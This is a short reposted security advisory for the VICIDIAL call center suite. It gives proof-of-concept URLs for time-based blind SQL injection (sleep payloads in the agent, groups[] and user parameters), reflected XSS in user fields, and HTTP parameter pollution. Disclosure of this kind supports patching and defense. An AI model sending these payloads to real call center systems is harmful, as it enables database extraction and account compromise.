...:::::VICIDIAL call center suite Blind SQL Injection Vulnerability::::.... #          

 
作者r: Sepahan TelCom IT Group (septelcom) 
 
官网: http://www.vicidial.org 
 
下砸: https://sourceforge.net/project/showfiles.php?group_id=95133&package_id=101320 
 
影响版本: <=2.2.1-237 
 
                                     
 
VICIDIAL is a set of programs that are designed to 
 
interact with the Asterisk Open-Source PBX Phone system 
 
to act as a complete inbound/outbound call center suite. 
 
测试
 
http://site.com/AST_agent_time_sheet.php?agent=some-agent' and sleep(15)='&calls_summary=1&query_date=2012-09-07 
 
http://www.2cto.com /AST_timeonVDADall.php?adastats=1&DB=0&groups[]=1345' and sleep(15)='&RR=4 
 
http://site.com/vicidial_demo/user_stats.php?user=2000' and sleep(10)=' 
 


::::VICIDIAL call center suite XSS/HTTP Prameter pollution::::....       #          
 

 
作者: Sepahan TelCom IT Group (septelcom) 
 
官网: http://www.vicidial.org 
 
下载地址: https://sourceforge.net/project/showfiles.php?group_id=95133&package_id=101320 
 
影响版本: <=2.2.1-237 
                 
 
VICIDIAL is a set of programs that are designed to 
 
interact with the Asterisk Open-Source PBX Phone system 
 
to act as a complete inbound/outbound call center suite. 
 
----------------------------------
测试证明
 
  
 
XSS : 
 
  
 
http://site.com/admin_search_lead.php?alt_phone_search=&DB=1&first_name=lskkuuaj&last_name=lskkuuaj&lead_id=1&list_id=1&log_lead_id=1&log_phone=555-666-0606&phone=555-666-0606&status=1&submit=SUBMIT&user=[XSS]&vendor_id=1 
 
http://site.com/user_stats.php?user=[XSS] 
 
-------------- 
 
HTTP Prameter plution: 
 
  
 
http://www.2cto.com /./user_stats.php?user=shtuasvb&begin_date=2012-09-07&end_date=2012-09-07{HTPP} 
 
例子:

/user_stats.php?user=shtuasvb&begin_date=2012-09-07&end_date=2012-09-07&hadi685=sep148 
 
  
 
http://site.com/admin.php?ADD=3&user=someuser{HTPP} 
 
示例 :

./admin.php?ADD=3&user=hadi&sep18=tell15